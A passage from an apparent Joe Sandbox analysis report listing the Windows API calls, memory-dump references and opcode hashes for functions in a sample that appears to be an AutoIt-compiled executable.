                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00688F50
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0068BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00688F8A
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00688FAA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: 44434bc161efd85d249a45248f399cbf8b81192677b44aa508ff0434bf4cc363
                                                                    • Instruction ID: 42c285313cb74172ecc389cfded8ee62acceaeaa6fc7c639ae2c33870a9cdf29
                                                                    • Opcode Fuzzy Hash: 44434bc161efd85d249a45248f399cbf8b81192677b44aa508ff0434bf4cc363
                                                                    • Instruction Fuzzy Hash: B3317F72200214BFEB109F50CC49FEB3BAEEF4A755F045165FE09DA291CA75A841CB74
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0069016D
                                                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0069038D
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006903AB
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 006903D6
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006903FF
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00690421
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00690440
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                    • String ID:
                                                                    • API String ID: 3356174886-0
                                                                    • Opcode ID: 551bc81035e63065584a8a2876d497a040bf89693615e19a03d69e49134c4d41
                                                                    • Instruction ID: 8e5dea34e62a735482c34ff29afd0b1373e9fb84427dd1bb2d8ae75e247c8484
                                                                    • Opcode Fuzzy Hash: 551bc81035e63065584a8a2876d497a040bf89693615e19a03d69e49134c4d41
                                                                    • Instruction Fuzzy Hash: F2A18A35600616EFEF18CF68C9897FDBBBABF08700F088119E855AB690D734AD51DB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da073f705e5f5651661fee89212170a625f5a2c82acb6f6fc88a2ae23ce12e40
                                                                    • Instruction ID: 7428e45b26b6cc7d90780c306dfe499715c82d5bc991e15af3280761da693b63
                                                                    • Opcode Fuzzy Hash: da073f705e5f5651661fee89212170a625f5a2c82acb6f6fc88a2ae23ce12e40
                                                                    • Instruction Fuzzy Hash: 49716CB1900109EFCF14CF98CC89AEEBB7AFF85314F148149F955A6251C731AA42DFA5
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0068225A
                                                                    • _memset.LIBCMT ref: 00682323
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00682368
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                      • Part of subcall function 0063C6F4: _wcscpy.LIBCMT ref: 0063C717
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0068242F
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0068243E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                    • String ID: @
                                                                    • API String ID: 4082843840-2766056989
                                                                    • Opcode ID: 1a2a2bbdd83c3bcbc5ad30b54d7c86de280d66ec2f1dd2e2b249aa5d0f2c6139
                                                                    • Instruction ID: 5b3304c9eff9a87148446cf5f0b310a1f9385463c459a75e2191df79397fe398
                                                                    • Opcode Fuzzy Hash: 1a2a2bbdd83c3bcbc5ad30b54d7c86de280d66ec2f1dd2e2b249aa5d0f2c6139
                                                                    • Instruction Fuzzy Hash: FC715E7490062A9FCF15EF94D4A199EB7F6FF48310F108559E856AB351CB34AE40CF98
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 00663C02
                                                                    • GetKeyboardState.USER32(?), ref: 00663C17
                                                                    • SetKeyboardState.USER32(?), ref: 00663C78
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00663CA4
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00663CC1
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00663D05
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00663D26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: d436d5ae40eb42f72a5c306e56d9ae383061df3f28853161b37b8cf0fa9c1017
                                                                    • Instruction ID: 6c10072c8ae512054ab4c7847a7b65379d2a4c8c3f604a301e2ef2f6ed1c405c
                                                                    • Opcode Fuzzy Hash: d436d5ae40eb42f72a5c306e56d9ae383061df3f28853161b37b8cf0fa9c1017
                                                                    • Instruction Fuzzy Hash: B151E5A09047E53DFB3287248C55BF6BFAAAF06304F08848CF1D556BC2D694EE84D760
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00683DA1
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00683DCB
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00683E80
                                                                      • Part of subcall function 00683D72: RegCloseKey.ADVAPI32(?), ref: 00683DE8
                                                                      • Part of subcall function 00683D72: FreeLibrary.KERNEL32(?), ref: 00683E3A
                                                                      • Part of subcall function 00683D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00683E5D
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00683E25
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 395352322-0
                                                                    • Opcode ID: 9d7e27c5a78834def05c6a90fb71cf60465ead2f7bd02a5228c8f8009edfc99c
                                                                    • Instruction ID: 41f6820daa4b9cbabcdd312c9751723a692278d9a131ba519f1eb468404e8d48
                                                                    • Opcode Fuzzy Hash: 9d7e27c5a78834def05c6a90fb71cf60465ead2f7bd02a5228c8f8009edfc99c
                                                                    • Instruction Fuzzy Hash: 6731FEB1901119BFDB15AF94DC89AFFB7BDEF09700F00026AE512E2251D674AF459B60
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00688FE7
                                                                    • GetWindowLongW.USER32(0127FFB0,000000F0), ref: 0068901A
                                                                    • GetWindowLongW.USER32(0127FFB0,000000F0), ref: 0068904F
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00689081
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006890AB
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 006890BC
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006890D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: 603d1f74729362a3f8ef27679b04a6b864971aee0f35e9d046bd5af25dd72fa1
                                                                    • Instruction ID: 76a1ca5a37d7820cc690e3d94417ddec1581a8eb27760ac3cd2842d3338893f7
                                                                    • Opcode Fuzzy Hash: 603d1f74729362a3f8ef27679b04a6b864971aee0f35e9d046bd5af25dd72fa1
                                                                    • Instruction Fuzzy Hash: D1312474640215EFDB21AF58DC84FA437A6FB4A714F181268F61A8F2B1CBB1A840DF61
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006608F2
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00660918
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0066091B
                                                                    • SysAllocString.OLEAUT32(?), ref: 00660939
                                                                    • SysFreeString.OLEAUT32(?), ref: 00660942
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00660967
                                                                    • SysAllocString.OLEAUT32(?), ref: 00660975
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: dc0323e5ad53aa919c7f48c99755ebb51f26efffe913c89fcf09d52160339d18
                                                                    • Instruction ID: 9664ee66962642ae3b2b2627589e6387099ae993d47fb39b7ceb3526bab9475b
                                                                    • Opcode Fuzzy Hash: dc0323e5ad53aa919c7f48c99755ebb51f26efffe913c89fcf09d52160339d18
                                                                    • Instruction Fuzzy Hash: B8219576601219AFAB10AF68CC88DEB73EEEB09360B009235F915DB251D674FC458BA4
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: bbc66d0f1d75c2844b981270b395b265a8bbad925aabd8b6fcaa7f905c8bd783
                                                                    • Instruction ID: 5af5232c889acbd12e83b632181a1ae0f078e0cc9997306ed93a966ee9af1f09
                                                                    • Opcode Fuzzy Hash: bbc66d0f1d75c2844b981270b395b265a8bbad925aabd8b6fcaa7f905c8bd783
                                                                    • Instruction Fuzzy Hash: 15213A72544A1367D330AB24DD22EFB73DBEF65310F504029F4479B141EA659992C399
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006609CB
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006609F1
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 006609F4
                                                                    • SysAllocString.OLEAUT32 ref: 00660A15
                                                                    • SysFreeString.OLEAUT32 ref: 00660A1E
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00660A38
                                                                    • SysAllocString.OLEAUT32(?), ref: 00660A46
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 4ac1697ef53e69022aa649ad6c4d9fcc7d874bdaab2bbebbcb5f140c12b3bf77
                                                                    • Instruction ID: 091f8d77a352d59bd0f5743fdcbda82c49f8623ae5e243cfd9217f52c91a4db1
                                                                    • Opcode Fuzzy Hash: 4ac1697ef53e69022aa649ad6c4d9fcc7d874bdaab2bbebbcb5f140c12b3bf77
                                                                    • Instruction Fuzzy Hash: EE213575604204BFAB10EBE8DC89DAB77EEEF093607548135F909CB261EA74EC418B54
                                                                    APIs
                                                                      • Part of subcall function 0063D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063D1BA
                                                                      • Part of subcall function 0063D17C: GetStockObject.GDI32(00000011), ref: 0063D1CE
                                                                      • Part of subcall function 0063D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063D1D8
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0068A32D
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0068A33A
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0068A345
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0068A354
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0068A360
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: 69e3ca74432be901d33994ff457c19b7ed0694ab5d29da92b7b46c7bdd7aac8c
                                                                    • Instruction ID: fdbdf3b3ae88055edfee016487b4b797f9ed65a6453e1e82350a6efd65673dd4
                                                                    • Opcode Fuzzy Hash: 69e3ca74432be901d33994ff457c19b7ed0694ab5d29da92b7b46c7bdd7aac8c
                                                                    • Instruction Fuzzy Hash: 7B1193B1150219BFEF115FA0CC85EEB7F6EFF09798F014215BA04A6160C6729C21DBA4
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 0063CCF6
                                                                    • GetWindowRect.USER32(?,?), ref: 0063CD37
                                                                    • ScreenToClient.USER32(?,?), ref: 0063CD5F
                                                                    • GetClientRect.USER32(?,?), ref: 0063CE8C
                                                                    • GetWindowRect.USER32(?,?), ref: 0063CEA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$Screen
                                                                    • String ID:
                                                                    • API String ID: 1296646539-0
                                                                    • Opcode ID: 5ac2baa790209f70878b83f276adf7b83470d598718fde168067fe51fbff7c9f
                                                                    • Instruction ID: 353538471af86b8577d6d6c0c9c55bd6ba40056b7436959131c1e5fb3517f2d6
                                                                    • Opcode Fuzzy Hash: 5ac2baa790209f70878b83f276adf7b83470d598718fde168067fe51fbff7c9f
                                                                    • Instruction Fuzzy Hash: 25B14879A00249DBDF10CFA8C4807EEBBB2FF08310F149529EC59EB654DB31A951DBA4
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00681C18
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00681C26
                                                                    • __wsplitpath.LIBCMT ref: 00681C54
                                                                      • Part of subcall function 00641DFC: __wsplitpath_helper.LIBCMT ref: 00641E3C
                                                                    • _wcscat.LIBCMT ref: 00681C69
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00681CDF
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00681CF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID:
                                                                    • API String ID: 1380811348-0
                                                                    • Opcode ID: 656a5fdc250c3017bdd266626c06c7617952baad45e65aaffd3a9c53c1e67ded
                                                                    • Instruction ID: afe576b45bba455e93b7e16b721b850dacf67245684ace3c70d76c8af0a78549
                                                                    • Opcode Fuzzy Hash: 656a5fdc250c3017bdd266626c06c7617952baad45e65aaffd3a9c53c1e67ded
                                                                    • Instruction Fuzzy Hash: B6519EB11043009FD720EF24D881EABB7EDEF89754F004A1EF58A97251EB30EA05CB96
                                                                    APIs
                                                                      • Part of subcall function 00683C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006830AF
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006830EF
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00683112
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0068313B
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0068317E
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0068318B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                    • String ID:
                                                                    • API String ID: 3451389628-0
                                                                    • Opcode ID: 9f8d98869b46da68f11fec7a9c3c7ebbb2d01bf1f9713691fab730d4ad12f11f
                                                                    • Instruction ID: 0d2beaa8dafca427e965ec42fd44140d55e7938e12607002a864ccf07bc6a2a0
                                                                    • Opcode Fuzzy Hash: 9f8d98869b46da68f11fec7a9c3c7ebbb2d01bf1f9713691fab730d4ad12f11f
                                                                    • Instruction Fuzzy Hash: B7515831104210AFC744EF64C885EAEBBEAFF89714F044A1DF595872A1DB71EA05CF56
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00688540
                                                                    • GetMenuItemCount.USER32(00000000), ref: 00688577
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0068859F
                                                                    • GetMenuItemID.USER32(?,?), ref: 0068860E
                                                                    • GetSubMenu.USER32(?,?), ref: 0068861C
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0068866D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                    • String ID:
                                                                    • API String ID: 650687236-0
                                                                    • Opcode ID: f6dec043af5a35767639493d07f5ec253978c60e60f01e6ccda5a92c7b88f53c
                                                                    • Instruction ID: 2d58a69058c80f5f945c8f6236d8a5ecbe1c8d2f2a4e5efcc5c013724c7d2741
                                                                    • Opcode Fuzzy Hash: f6dec043af5a35767639493d07f5ec253978c60e60f01e6ccda5a92c7b88f53c
                                                                    • Instruction Fuzzy Hash: B9518B71E00625AFCB51EFA4C841AEEB7F6EF48310F104599E916BB351DB30AE418F95
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00664B10
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00664B5B
